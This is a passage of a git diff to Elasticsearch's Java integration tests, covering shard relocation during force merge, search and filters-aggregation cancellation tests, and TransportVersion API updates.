indicesSegmentResponseBeforeRelocation.getIndices().get(indexName).iterator().next().shards()[0].getSegments(), + iterableWithSize(greaterThan(1)) + ); + // start another node + final String node2 = internalCluster().startNode(); + ensureStableCluster(2); + setTotalSpace(node2, Long.MAX_VALUE); + // relocate the shard from node1 to node2 + ClusterRerouteUtils.reroute(client(), new MoveAllocationCommand(indexName, 0, node1, node2, Metadata.DEFAULT_PROJECT_ID)); + ClusterHealthResponse clusterHealthResponse = clusterAdmin().prepareHealth(TEST_REQUEST_TIMEOUT) + .setWaitForEvents(Priority.LANGUID) + .setWaitForNoRelocatingShards(true) + .setTimeout(ACCEPTABLE_RELOCATION_TIME) + .get(); + assertThat(clusterHealthResponse.isTimedOut(), equalTo(false)); + // the force merge call 
is now unblocked + assertBusy(() -> { + assertTrue(forceMergeBeforeRelocationFuture.isDone()); + assertFalse(forceMergeBeforeRelocationFuture.isCancelled()); + }); + // there is some merging going on in the {@code PostRecoveryMerger} after recovery, but that's not guaranteeing us a single segment, + // so let's trigger a force merge to 1 segment again (this one should succeed promptly) + indicesAdmin().prepareForceMerge(indexName).setMaxNumSegments(1).get(); + IndicesSegmentResponse indicesSegmentResponseAfterRelocation = indicesAdmin().prepareSegments(indexName).get(); + // assert there's only one segment now + assertThat( + indicesSegmentResponseAfterRelocation.getIndices().get(indexName).iterator().next().shards()[0].getSegments(), + iterableWithSize(1) + ); + // also assert that the shard was indeed moved to a different node + assertThat( + indicesSegmentResponseAfterRelocation.getIndices().get(indexName).iterator().next().shards()[0].getShardRouting() + .currentNodeId(), + not( + equalTo( + indicesSegmentResponseBeforeRelocation.getIndices().get(indexName).iterator().next().shards()[0].getShardRouting() + .currentNodeId() + ) + ) + ); + } + public void setTotalSpace(String dataNodeName, long totalSpace) { getTestFileStore(dataNodeName).setTotalSpace(totalSpace); refreshClusterInfo(); } + + private TestTelemetryPlugin getTelemetryPlugin(String dataNodeName) { + var plugin = internalCluster().getInstance(PluginsService.class, dataNodeName) + .filterPlugins(TestTelemetryPlugin.class) + .findFirst() + .orElseThrow(); + plugin.resetMeter(); + return plugin; + } } diff --git a/server/src/internalClusterTest/java/org/elasticsearch/index/engine/ThreadPoolMergeSchedulerStressTestIT.java b/server/src/internalClusterTest/java/org/elasticsearch/index/engine/ThreadPoolMergeSchedulerStressTestIT.java index 9129292d43837..41a05202b2357 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/index/engine/ThreadPoolMergeSchedulerStressTestIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/index/engine/ThreadPoolMergeSchedulerStressTestIT.java @@ -16,6 +16,7 @@ import org.elasticsearch.action.admin.indices.segments.IndexShardSegments; import org.elasticsearch.action.admin.indices.segments.IndicesSegmentResponse; import org.elasticsearch.action.admin.indices.segments.ShardSegments; +import org.elasticsearch.action.admin.indices.stats.IndicesStatsResponse; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.common.util.CollectionUtils; import org.elasticsearch.common.util.concurrent.ConcurrentCollections; @@ -44,6 +45,7 @@ import java.util.concurrent.atomic.AtomicReference; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAllSuccessful; +import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.greaterThanOrEqualTo; import static org.hamcrest.Matchers.instanceOf; import static org.hamcrest.Matchers.is; @@ -272,12 +274,11 @@ public void testMergingFallsBehindAndThenCatchesUp() throws Exception { assertThat(testEnginePlugin.enqueuedMergesSet.size(), is(0)); testEnginePlugin.mergeExecutorServiceReference.get().allDone(); }, 1, TimeUnit.MINUTES); - var segmentsCountAfterMergingCaughtUp = getSegmentsCountForAllShards("index"); - // force merge should be a noop after all available merging was done - assertAllSuccessful(indicesAdmin().prepareForceMerge("index").get()); - var segmentsCountAfterForceMerge = getSegmentsCountForAllShards("index"); - assertThat(segmentsCountAfterForceMerge, 
is(segmentsCountAfterMergingCaughtUp)); - // let's also run a force-merge to 1 segment + // indices stats says that no merge is currently running (meaning merging did catch up) + IndicesStatsResponse indicesStatsResponse = client().admin().indices().prepareStats("index").setMerge(true).get(); + long currentMergeCount = indicesStatsResponse.getIndices().get("index").getPrimaries().merge.getCurrent(); + assertThat(currentMergeCount, equalTo(0L)); + // run a force-merge to 1 segment to make sure nothing is broken assertAllSuccessful(indicesAdmin().prepareForceMerge("index").setMaxNumSegments(1).get()); assertAllSuccessful(indicesAdmin().prepareRefresh("index").get()); // assert one segment per shard @@ -292,20 +293,6 @@ public void testMergingFallsBehindAndThenCatchesUp() throws Exception { } } - private int getSegmentsCountForAllShards(String indexName) { - // refresh, otherwise we'd be still seeing the old merged-away segments - assertAllSuccessful(indicesAdmin().prepareRefresh(indexName).get()); - int count = 0; - IndicesSegmentResponse indicesSegmentResponse = indicesAdmin().prepareSegments(indexName).get(); - Iterator indexShardSegmentsIterator = indicesSegmentResponse.getIndices().get(indexName).iterator(); - while (indexShardSegmentsIterator.hasNext()) { - for (ShardSegments segments : indexShardSegmentsIterator.next()) { - count += segments.getSegments().size(); - } - } - return count; - } - private TestEnginePlugin getTestEnginePlugin() { return getInstanceFromNode(PluginsService.class).filterPlugins(TestEnginePlugin.class).toList().get(0); } diff --git a/server/src/internalClusterTest/java/org/elasticsearch/index/shard/RemoveCorruptedShardDataCommandIT.java b/server/src/internalClusterTest/java/org/elasticsearch/index/shard/RemoveCorruptedShardDataCommandIT.java index b9513dfb95187..d1cff7b2a30d1 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/index/shard/RemoveCorruptedShardDataCommandIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/index/shard/RemoveCorruptedShardDataCommandIT.java @@ -58,6 +58,7 @@ import org.elasticsearch.plugins.Plugin; import org.elasticsearch.test.CorruptionUtils; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.InternalSettingsPlugin; import org.elasticsearch.test.InternalTestCluster; import org.elasticsearch.test.engine.MockEngineSupport; @@ -93,6 +94,7 @@ import static org.hamcrest.Matchers.startsWith; @ESIntegTestCase.ClusterScope(scope = ESIntegTestCase.Scope.TEST, numDataNodes = 0) +@ESTestCase.WithoutEntitlements // commands don't run with entitlements enforced public class RemoveCorruptedShardDataCommandIT extends ESIntegTestCase { @Override diff --git a/server/src/internalClusterTest/java/org/elasticsearch/index/store/DirectIOIT.java b/server/src/internalClusterTest/java/org/elasticsearch/index/store/DirectIOIT.java index c80eac73f4f6a..f7707d27b41e7 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/index/store/DirectIOIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/index/store/DirectIOIT.java @@ -17,10 +17,12 @@ import org.apache.lucene.store.IndexOutput; import org.apache.lucene.tests.util.LuceneTestCase; import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.index.codec.vectors.es818.ES818BinaryQuantizedVectorsFormat; import org.elasticsearch.plugins.Plugin; import org.elasticsearch.search.vectors.KnnSearchBuilder; import org.elasticsearch.search.vectors.VectorData; import 
org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.InternalSettingsPlugin; import org.elasticsearch.test.MockLog; import org.elasticsearch.test.junit.annotations.TestLogging; @@ -40,10 +42,12 @@ import static org.hamcrest.Matchers.is; @LuceneTestCase.SuppressCodecs("*") // only use our own codecs +@ESTestCase.WithoutEntitlements // requires entitlement delegation ES-10920 public class DirectIOIT extends ESIntegTestCase { @BeforeClass public static void checkSupported() throws IOException { + assumeTrue("test requires direct IO", ES818BinaryQuantizedVectorsFormat.USE_DIRECT_IO); Path path = createTempDir("directIOProbe"); try (Directory dir = open(path); IndexOutput out = dir.createOutput("out", IOContext.DEFAULT)) { out.writeString("test"); diff --git a/server/src/internalClusterTest/java/org/elasticsearch/search/SearchCancellationIT.java b/server/src/internalClusterTest/java/org/elasticsearch/search/SearchCancellationIT.java index c2feaa4e6fe9f..4771764a11b23 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/search/SearchCancellationIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/search/SearchCancellationIT.java @@ -29,7 +29,7 @@ import org.elasticsearch.script.ScriptType; import org.elasticsearch.search.aggregations.bucket.terms.TermsAggregationBuilder; import org.elasticsearch.search.aggregations.metrics.ScriptedMetricAggregationBuilder; -import org.elasticsearch.search.internal.ReaderContext; +import org.elasticsearch.search.internal.SearchContext; import org.elasticsearch.tasks.Task; import org.elasticsearch.tasks.TaskCancelledException; import org.elasticsearch.test.AbstractSearchCancellationTestCase; @@ -42,6 +42,7 @@ import java.util.concurrent.CountDownLatch; import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicBoolean; +import java.util.concurrent.atomic.AtomicReference; import static org.elasticsearch.index.query.QueryBuilders.matchAllQuery; import static org.elasticsearch.index.query.QueryBuilders.scriptQuery; @@ -240,80 +241,103 @@ public void testCancelMultiSearch() throws Exception { } public void testCancelFailedSearchWhenPartialResultDisallowed() throws Exception { - // TODO: make this test compatible with batched execution, currently the exceptions are slightly different with batched - updateClusterSettings(Settings.builder().put(SearchService.BATCHED_QUERY_PHASE.getKey(), false)); - // Have at least two nodes so that we have parallel execution of two request guaranteed even if max concurrent requests per node - // are limited to 1 - internalCluster().ensureAtLeastNumDataNodes(2); - int numberOfShards = between(2, 5); - createIndex("test", numberOfShards, 0); - indexTestData(); - - // Define (but don't run) the search request, expecting a partial shard failure. We will run it later. - Thread searchThread = new Thread(() -> { - logger.info("Executing search"); - SearchPhaseExecutionException e = expectThrows( - SearchPhaseExecutionException.class, - prepareSearch("test").setSearchType(SearchType.QUERY_THEN_FETCH) - .setQuery(scriptQuery(new Script(ScriptType.INLINE, "mockscript", SEARCH_BLOCK_SCRIPT_NAME, Collections.emptyMap()))) - .setAllowPartialSearchResults(false) - .setSize(1000) - ); - assertThat(e.getMessage(), containsString("Partial shards failure")); - }); - - // When the search request executes, block all shards except 1. 
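The comment just above describes the gating pattern that both the removed block below and its batched-aware replacement rely on: exactly one shard task (or, in the batched case, one node's worth of shard tasks) is allowed to run its query phase, while every other task parks on a latch until the test's cleanup releases it. A self-contained sketch of that pattern, under the assumption that the ShardGate name and wiring are purely illustrative and not part of the Elasticsearch test framework:

    import java.util.concurrent.CountDownLatch;
    import java.util.concurrent.atomic.AtomicBoolean;

    // Illustrative distillation of the letOneShardProceed / waitingTaskLatch /
    // shardTaskLatch trio used by the test; names are hypothetical.
    class ShardGate {
        private final AtomicBoolean letOneProceed = new AtomicBoolean();
        private final CountDownLatch taskIsWaiting = new CountDownLatch(1); // "some task is parked"
        private final CountDownLatch release = new CountDownLatch(1);       // opened during cleanup

        void onShardQuery() throws InterruptedException {
            if (letOneProceed.compareAndSet(false, true)) {
                return;                // exactly one shard runs its query phase
            }
            taskIsWaiting.countDown(); // tell the test that a task is now blocked
            release.await();           // park until the test counts the release latch down
        }

        void awaitBlockedTask() throws InterruptedException {
            taskIsWaiting.await();     // test side: wait until at least one shard is parked
        }

        void releaseAll() {
            release.countDown();       // test side: unblock every parked shard
        }
    }

The replacement below extends this to batched query execution by keying the gate on the first node observed (selectedNodeId) rather than the first shard, so all shards on one node proceed and the rest stay parked.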
- final List<SearchShardBlockingPlugin> searchShardBlockingPlugins = initSearchShardBlockingPlugin(); - AtomicBoolean letOneShardProceed = new AtomicBoolean(); - // Ensure we have at least one task waiting on the latch - CountDownLatch waitingTaskLatch = new CountDownLatch(1); - CountDownLatch shardTaskLatch = new CountDownLatch(1); - for (SearchShardBlockingPlugin plugin : searchShardBlockingPlugins) { - plugin.setRunOnNewReaderContext((ReaderContext c) -> { - if (letOneShardProceed.compareAndSet(false, true)) { - // Let one shard continue. - } else { - // Signal that we have a task waiting on the latch - waitingTaskLatch.countDown(); - safeAwait(shardTaskLatch); // Block the other shards. - } + boolean useBatched = randomBoolean(); + try { + if (useBatched == false) { // It's true by default + updateClusterSettings(Settings.builder().put(SearchService.BATCHED_QUERY_PHASE.getKey(), false)); + } + // Have at least two nodes so that we have parallel execution of two requests guaranteed even if max concurrent requests per node + // are limited to 1 + internalCluster().ensureAtLeastNumDataNodes(2); + int numberOfShards = between(2, 5); + createIndex("test", numberOfShards, 0); + indexTestData(); + + // Define (but don't run) the search request, expecting a partial shard failure. We will run it later. + Thread searchThread = new Thread(() -> { + logger.info("Executing search"); + SearchPhaseExecutionException e = expectThrows( + SearchPhaseExecutionException.class, + prepareSearch("test").setSearchType(SearchType.QUERY_THEN_FETCH) + .setQuery( + scriptQuery(new Script(ScriptType.INLINE, "mockscript", SEARCH_BLOCK_SCRIPT_NAME, Collections.emptyMap())) + ) + .setAllowPartialSearchResults(false) + .setSize(1000) + ); + assertThat(e.getMessage(), containsString("Partial shards failure")); + }); - } + // When the search request executes, allow some shards to proceed and block others + final List<SearchShardBlockingPlugin> searchShardBlockingPlugins = initSearchShardBlockingPlugin(); + CountDownLatch waitingTaskLatch = new CountDownLatch(1); + CountDownLatch shardTaskLatch = new CountDownLatch(1); + final AtomicReference<String> selectedNodeId = new AtomicReference<>(); + final AtomicBoolean letOneShardProceed = new AtomicBoolean(); + for (SearchShardBlockingPlugin plugin : searchShardBlockingPlugins) { + plugin.setRunOnPreQueryPhase((SearchContext c) -> { + if (useBatched) { // Allow all the shards on one node to continue. Block all others. + String nodeId = c.shardTarget().getNodeId(); + if (selectedNodeId.compareAndSet(null, nodeId) || nodeId.equals(selectedNodeId.get())) { + logger.info("Allowing shard [{}] on node [{}] to proceed", c.shardTarget().getShardId(), nodeId); + } else { + logger.info("Blocking shard [{}] on node [{}]", c.shardTarget().getShardId(), nodeId); + // Signal that we have a task waiting on the latch + waitingTaskLatch.countDown(); + safeAwait(shardTaskLatch); // Block shards on other nodes + } + } else { // Allow one shard to continue. Block all others.
+ if (letOneShardProceed.compareAndSet(false, true)) { + logger.info("Allowing shard [{}] to proceed", c.shardTarget().getShardId()); + } else { + logger.info("Blocking shard [{}]", c.shardTarget().getShardId()); + // Signal that we have a task waiting on the latch + waitingTaskLatch.countDown(); + safeAwait(shardTaskLatch); // Block all other shards + } + } + }); + } - // Now run the search request. - logger.info("Starting search thread"); - searchThread.start(); + // For the shards that were allowed to proceed, have a single query-execution thread throw an exception. + final List plugins = initBlockFactory(); + AtomicBoolean oneThreadWillError = new AtomicBoolean(); + for (ScriptedBlockPlugin plugin : plugins) { + plugin.disableBlock(); + plugin.setBeforeExecution(() -> { + if (oneThreadWillError.compareAndSet(false, true)) { + // wait for some task to get to the latch + safeAwait(waitingTaskLatch); + // then throw the exception + throw new IllegalStateException("This will cancel the ContextIndexSearcher.search task"); + } + }); + } - try { - assertBusy(() -> { - final List coordinatorSearchTask = getCoordinatorSearchTasks(); - logger.info("Checking tasks: {}", coordinatorSearchTask); - assertThat("The Coordinator should have one SearchTask.", coordinatorSearchTask, hasSize(1)); - assertTrue("The SearchTask should be cancelled.", coordinatorSearchTask.get(0).isCancelled()); - for (var shardQueryTask : getShardQueryTasks()) { - assertTrue("All SearchShardTasks should then be cancelled", shardQueryTask.isCancelled()); - } - }, 30, TimeUnit.SECONDS); + // Now run the search request. + logger.info("Starting search thread"); + searchThread.start(); + + try { + assertBusy(() -> { + final List coordinatorSearchTask = getCoordinatorSearchTasks(); + logger.info("Checking tasks: {}", coordinatorSearchTask); + assertThat("The Coordinator should have one SearchTask.", coordinatorSearchTask, hasSize(1)); + assertTrue("The SearchTask should be cancelled.", coordinatorSearchTask.get(0).isCancelled()); + for (var shardQueryTask : getShardQueryTasks()) { + assertTrue("All SearchShardTasks should then be cancelled", shardQueryTask.isCancelled()); + } + }, 30, TimeUnit.SECONDS); + } finally { + shardTaskLatch.countDown(); // unblock the shardTasks, allowing the test to conclude. + searchThread.join(); + plugins.forEach(plugin -> plugin.setBeforeExecution(() -> {})); + searchShardBlockingPlugins.forEach(plugin -> plugin.setRunOnPreQueryPhase((SearchContext c) -> {})); + } } finally { - shardTaskLatch.countDown(); // unblock the shardTasks, allowing the test to conclude. 
- searchThread.join(); - plugins.forEach(plugin -> plugin.setBeforeExecution(() -> {})); - searchShardBlockingPlugins.forEach(plugin -> plugin.setRunOnNewReaderContext((ReaderContext c) -> {})); + if (useBatched == false) { + updateClusterSettings(Settings.builder().putNull(SearchService.BATCHED_QUERY_PHASE.getKey())); + } } } diff --git a/server/src/internalClusterTest/java/org/elasticsearch/search/SearchWithRejectionsIT.java b/server/src/internalClusterTest/java/org/elasticsearch/search/SearchWithRejectionsIT.java index 8081c05945da6..dd73522d09b42 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/search/SearchWithRejectionsIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/search/SearchWithRejectionsIT.java @@ -58,7 +58,7 @@ public void testOpenContextsAfterRejections() throws Exception { } assertBusy( () -> assertThat(indicesAdmin().prepareStats().get().getTotal().getSearch().getOpenContexts(), equalTo(0L)), - 1, + 2, TimeUnit.SECONDS ); } diff --git a/server/src/internalClusterTest/java/org/elasticsearch/search/aggregations/bucket/FiltersCancellationIT.java b/server/src/internalClusterTest/java/org/elasticsearch/search/aggregations/bucket/FiltersCancellationIT.java new file mode 100644 index 0000000000000..1ef832c57ce2f --- /dev/null +++ b/server/src/internalClusterTest/java/org/elasticsearch/search/aggregations/bucket/FiltersCancellationIT.java @@ -0,0 +1,236 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". 
+ */ + +package org.elasticsearch.search.aggregations.bucket; + +import org.elasticsearch.action.bulk.BulkRequestBuilder; +import org.elasticsearch.action.search.SearchRequestBuilder; +import org.elasticsearch.action.search.TransportSearchAction; +import org.elasticsearch.action.support.WriteRequest; +import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.common.util.CollectionUtils; +import org.elasticsearch.core.TimeValue; +import org.elasticsearch.index.mapper.OnScriptError; +import org.elasticsearch.plugins.Plugin; +import org.elasticsearch.plugins.ScriptPlugin; +import org.elasticsearch.script.LongFieldScript; +import org.elasticsearch.script.ScriptContext; +import org.elasticsearch.script.ScriptEngine; +import org.elasticsearch.search.aggregations.bucket.filter.FiltersAggregator.KeyedFilter; +import org.elasticsearch.search.lookup.SearchLookup; +import org.elasticsearch.tasks.TaskInfo; +import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.xcontent.XContentBuilder; +import org.elasticsearch.xcontent.json.JsonXContent; +import org.junit.Before; + +import java.util.Collection; +import java.util.List; +import java.util.Map; +import java.util.Set; +import java.util.concurrent.Semaphore; + +import static org.elasticsearch.index.query.QueryBuilders.termQuery; +import static org.elasticsearch.search.aggregations.AggregationBuilders.filters; +import static org.elasticsearch.search.aggregations.AggregationBuilders.terms; +import static org.hamcrest.Matchers.empty; +import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.greaterThan; +import static org.hamcrest.Matchers.not; +
+/** + * Ensures the filters aggregation checks task cancellation, by ensuring it doesn't process all the docs. + * <p> + * The CancellableBulkScorer we use to break the execution is called per search thread in the query. + * It currently breaks the "for each doc" into blocks of 4096 docs (x2 every iteration), and checks for cancellation between blocks. + * This test creates N docs and releases N - X permits, to ensure the search request gets cancelled before grabbing all the permits. + * </p> + * <p> + * Also, if the search thread pool size is too high, it can lead to them trying to process too many documents anyway (pool size * 4096), + * eventually blocking the threads (and failing the test). So it's explicitly set to a small number to avoid this. + * </p>
+ */ +@ESIntegTestCase.SuiteScopeTestCase +public class FiltersCancellationIT extends ESIntegTestCase { + + private static final String INDEX = "idx"; + private static final String PAUSE_FIELD = "pause"; + private static final String NUMERIC_FIELD = "value"; + + private static final int NUM_DOCS = 100_000; + private static final int SEMAPHORE_PERMITS = NUM_DOCS - 1000; + private static final Semaphore SCRIPT_SEMAPHORE = new Semaphore(0); + + @Override + protected Collection> nodePlugins() { + return CollectionUtils.appendToCopy(super.nodePlugins(), PauseScriptPlugin.class); + } + + @Override + public Settings nodeSettings(int nodeOrdinal, Settings otherSettings) { + return Settings.builder().put(super.nodeSettings(nodeOrdinal, otherSettings)).put("thread_pool.search.size", 4).build(); + } + + @Override + public void setupSuiteScopeCluster() throws Exception { + try (XContentBuilder mapping = JsonXContent.contentBuilder()) { + mapping.startObject(); + mapping.startObject("runtime"); + { + mapping.startObject(PAUSE_FIELD); + { + mapping.field("type", "long"); + mapping.startObject("script").field("source", "").field("lang", PauseScriptPlugin.PAUSE_SCRIPT_LANG).endObject(); + } + mapping.endObject(); + mapping.startObject(NUMERIC_FIELD); + { + mapping.field("type", "long"); + } + mapping.endObject(); + } + mapping.endObject(); + mapping.endObject(); + + client().admin().indices().prepareCreate(INDEX).setMapping(mapping).get(); + } + + int DOCS_PER_BULK = 100_000; + for (int i = 0; i < NUM_DOCS; i += DOCS_PER_BULK) { + BulkRequestBuilder bulk = client().prepareBulk().setRefreshPolicy(WriteRequest.RefreshPolicy.IMMEDIATE); + for (int j = 0; j < DOCS_PER_BULK; j++) { + int docId = i + j; + bulk.add(prepareIndex(INDEX).setId(Integer.toString(docId)).setSource(NUMERIC_FIELD, docId)); + } + bulk.get(); + } + + client().admin().indices().prepareForceMerge(INDEX).setMaxNumSegments(1).get(); + } + + @Before + public void reset() { + SCRIPT_SEMAPHORE.drainPermits(); + } + + public void testFiltersCountCancellation() throws Exception { + ensureProperCancellation( + client().prepareSearch(INDEX) + .addAggregation( + filters( + "filters", + new KeyedFilter[] { + new KeyedFilter("filter1", termQuery(PAUSE_FIELD, 1)), + new KeyedFilter("filter2", termQuery(PAUSE_FIELD, 2)) } + ) + ) + ); + } + + public void testFiltersSubAggsCancellation() throws Exception { + ensureProperCancellation( + client().prepareSearch(INDEX) + .addAggregation( + filters( + "filters", + new KeyedFilter[] { + new KeyedFilter("filter1", termQuery(PAUSE_FIELD, 1)), + new KeyedFilter("filter2", termQuery(PAUSE_FIELD, 2)) } + ).subAggregation(terms("sub").field(PAUSE_FIELD)) + ) + ); + } + + private void ensureProperCancellation(SearchRequestBuilder searchRequestBuilder) throws Exception { + var searchRequestFuture = searchRequestBuilder.setTimeout(TimeValue.timeValueSeconds(1)).execute(); + assertThat(searchRequestFuture.isCancelled(), equalTo(false)); + assertThat(searchRequestFuture.isDone(), equalTo(false)); + + // Check that there are search tasks running + assertThat(getSearchTasks(), not(empty())); + + // Wait for the script field to get blocked + assertBusy(() -> assertThat(SCRIPT_SEMAPHORE.getQueueLength(), greaterThan(0))); + + // Cancel the tasks + // Warning: Adding a waitForCompletion(true)/execute() here sometimes causes tasks to not get canceled and threads to get stuck + client().admin().cluster().prepareCancelTasks().setActions(TransportSearchAction.NAME + "*").get(); + + SCRIPT_SEMAPHORE.release(SEMAPHORE_PERMITS); + + 
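The class Javadoc above describes the mechanism this release step relies on: scoring runs in blocks that start at 4096 docs and double each round, with a cancellation check only between blocks, and the test releases fewer permits than there are docs so that only a cancelled search can ever terminate. A sketch of that loop shape, as a hypothetical stand-in (the real CancellableBulkScorer is not part of this diff):

    import java.util.function.IntConsumer;

    // Hypothetical sketch of the block-doubling scoring loop described above: docs are
    // scored in chunks (4096, then x2 each round) and cancellation is checked only
    // between chunks, so a cancelled search stops within at most one chunk.
    final class BlockDoublingScorer {
        static void scoreAll(int maxDoc, Runnable checkCancelled, IntConsumer scoreDoc) {
            int block = 4096;
            int doc = 0;
            while (doc < maxDoc) {
                checkCancelled.run();                              // cancellation check between blocks
                int upTo = (int) Math.min((long) doc + block, maxDoc);
                while (doc < upTo) {
                    scoreDoc.accept(doc++);                        // in this test, each doc's script acquires one semaphore permit
                }
                block *= 2;                                        // 4096, 8192, 16384, ...
            }
        }
    }

Since only NUM_DOCS - 1000 permits are ever released, an uncancelled search would eventually starve on the semaphore instead of completing, which the assertions that follow would surface as a timeout.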
// Ensure the search request finished and that there are no more search tasks + assertBusy(() -> { + assertThat("Search request didn't finish", searchRequestFuture.isDone(), equalTo(true)); + assertThat("There are dangling search tasks", getSearchTasks(), empty()); + }); + } + + private List getSearchTasks() { + return client().admin() + .cluster() + .prepareListTasks() + .setActions(TransportSearchAction.NAME + "*") + .setDetailed(true) + .get() + .getTasks(); + } + + public static class PauseScriptPlugin extends Plugin implements ScriptPlugin { + public static final String PAUSE_SCRIPT_LANG = "pause"; + + @Override + public ScriptEngine getScriptEngine(Settings settings, Collection> contexts) { + return new ScriptEngine() { + @Override + public String getType() { + return PAUSE_SCRIPT_LANG; + } + + @Override + @SuppressWarnings("unchecked") + public FactoryType compile( + String name, + String code, + ScriptContext context, + Map params + ) { + if (context == LongFieldScript.CONTEXT) { + return (FactoryType) new LongFieldScript.Factory() { + @Override + public LongFieldScript.LeafFactory newFactory( + String fieldName, + Map params, + SearchLookup searchLookup, + OnScriptError onScriptError + ) { + return ctx -> new LongFieldScript(fieldName, params, searchLookup, onScriptError, ctx) { + @Override + public void execute() { + try { + SCRIPT_SEMAPHORE.acquire(); + } catch (InterruptedException e) { + throw new AssertionError(e); + } + emit(1); + } + }; + } + }; + } + throw new IllegalStateException("unsupported type " + context); + } + + @Override + public Set> getSupportedContexts() { + return Set.of(LongFieldScript.CONTEXT); + } + }; + } + } +} diff --git a/server/src/internalClusterTest/java/org/elasticsearch/search/functionscore/FunctionScorePluginIT.java b/server/src/internalClusterTest/java/org/elasticsearch/search/functionscore/FunctionScorePluginIT.java index 1bf72071b6bbf..a9f5a6bd4f414 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/search/functionscore/FunctionScorePluginIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/search/functionscore/FunctionScorePluginIT.java @@ -11,7 +11,6 @@ import org.apache.lucene.search.Explanation; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.index.IndexRequest; import org.elasticsearch.action.search.SearchRequest; import org.elasticsearch.action.search.SearchType; @@ -137,7 +136,7 @@ public DecayFunction getDecayFunction() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } private static final DecayFunction decayFunction = new LinearMultScoreFunction(); diff --git a/server/src/internalClusterTest/java/org/elasticsearch/search/msearch/MultiSearchIT.java b/server/src/internalClusterTest/java/org/elasticsearch/search/msearch/MultiSearchIT.java index 5e4ae084eaa4a..a0945190d1222 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/search/msearch/MultiSearchIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/search/msearch/MultiSearchIT.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.msearch; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.search.MultiSearchRequest; import org.elasticsearch.action.search.MultiSearchResponse.Item; import org.elasticsearch.common.settings.Settings; @@ -90,10 +89,10 @@ public void testSimpleMultiSearchMoreRequests() 
throws Exception { /** * Test that triggering the CCS compatibility check with a query that shouldn't go to the minor before - * TransportVersions.MINIMUM_CCS_VERSION works + * TransportVersion.minimumCCSVersion() works */ public void testCCSCheckCompatibility() throws Exception { - TransportVersion transportVersion = TransportVersionUtils.getNextVersion(TransportVersions.MINIMUM_CCS_VERSION, true); + TransportVersion transportVersion = TransportVersionUtils.getNextVersion(TransportVersion.minimumCCSVersion(), true); createIndex("test"); ensureGreen(); prepareIndex("test").setId("1").setSource("field", "xxx").get(); diff --git a/server/src/internalClusterTest/java/org/elasticsearch/search/sort/FieldSortIT.java b/server/src/internalClusterTest/java/org/elasticsearch/search/sort/FieldSortIT.java index 2cd610f204d9e..97da362eebe82 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/search/sort/FieldSortIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/search/sort/FieldSortIT.java @@ -9,6 +9,7 @@ package org.elasticsearch.search.sort; +import org.apache.http.util.EntityUtils; import org.apache.lucene.tests.util.TestUtil; import org.apache.lucene.util.BytesRef; import org.apache.lucene.util.UnicodeUtil; @@ -20,6 +21,9 @@ import org.elasticsearch.action.search.SearchRequestBuilder; import org.elasticsearch.action.search.SearchResponse; import org.elasticsearch.action.search.ShardSearchFailure; +import org.elasticsearch.client.Request; +import org.elasticsearch.client.Response; +import org.elasticsearch.client.RestClient; import org.elasticsearch.cluster.metadata.IndexMetadata; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.core.Strings; @@ -36,6 +40,7 @@ import org.elasticsearch.search.SearchHits; import org.elasticsearch.test.ESIntegTestCase; import org.elasticsearch.test.InternalSettingsPlugin; +import org.elasticsearch.test.junit.annotations.TestIssueLogging; import org.elasticsearch.xcontent.XContentBuilder; import org.elasticsearch.xcontent.XContentFactory; import org.elasticsearch.xcontent.XContentType; @@ -84,6 +89,12 @@ import static org.hamcrest.Matchers.not; import static org.hamcrest.Matchers.nullValue; +@TestIssueLogging( + issueUrl = "https://github.com/elastic/elasticsearch/issues/129445", + value = "org.elasticsearch.action.search.SearchQueryThenFetchAsyncAction:DEBUG," + + "org.elasticsearch.action.search.SearchPhaseController:DEBUG," + + "org.elasticsearch.search:TRACE" +) public class FieldSortIT extends ESIntegTestCase { public static class CustomScriptPlugin extends MockScriptPlugin { @Override @@ -112,6 +123,10 @@ protected Collection> nodePlugins() { return Arrays.asList(InternalSettingsPlugin.class, CustomScriptPlugin.class); } + protected boolean addMockHttpTransport() { + return false; + } + public void testIssue8226() { int numIndices = between(5, 10); final boolean useMapping = randomBoolean(); @@ -2145,7 +2160,7 @@ public void testLongSortOptimizationCorrectResults() { ); } - public void testSortMixedFieldTypes() { + public void testSortMixedFieldTypes() throws IOException { assertAcked( prepareCreate("index_long").setMapping("foo", 